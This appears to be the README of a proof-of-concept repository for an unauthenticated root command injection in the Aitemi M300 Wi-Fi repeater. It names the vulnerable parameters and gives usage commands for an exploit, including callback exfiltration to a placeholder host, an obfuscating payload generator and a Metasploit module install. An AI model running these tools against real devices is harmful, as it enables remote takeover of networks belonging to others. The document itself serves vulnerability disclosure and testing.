
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] Este código é fornecido COMO ESTÁ apenas para fins educacionais e de pesquisa. Não use este PoC em sistemas de produção, ambientes compartilhados ou quaisquer alvos não autorizados.
- Executar ou hospedar este código pode acionar detecções de antivírus, alertas de monitoramento de segurança ou consequências legais se for mal utilizado.
- Os autores e mantenedores do repositório não assumem nenhuma responsabilidade por qualquer dano, uso indevido ou atividade ilegal resultante deste código.
- Use exclusivamente em ambientes de laboratório isolados com autorização adequada. Destinado apenas a pesquisa defensiva, análise de vulnerabilidades e testes de blue team.
Existe uma vulnerabilidade sem autenticação de injeção de comandos do SO no handler smacfilter_conf. Os parâmetros GET name, enable e mac são passados sem sanitização para uma chamada sprintf() que constrói comandos UCI executados como root.
poc.py - Exploit completo com suporte a HTTPS, tentativas, timeout e exfiltração por callback.val.py - Validador de vulnerabilidade seguro e passivo (usa o comando inofensivo id).gen.py - Gerador avançado de payloads com múltiplas técnicas de ofuscação.MITIGATIONS.md - Medidas defensivas recomendadas.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
Estrelas e contribuições são bem-vindas - especialmente melhorias em bypasses ou variantes adicionais de firmware.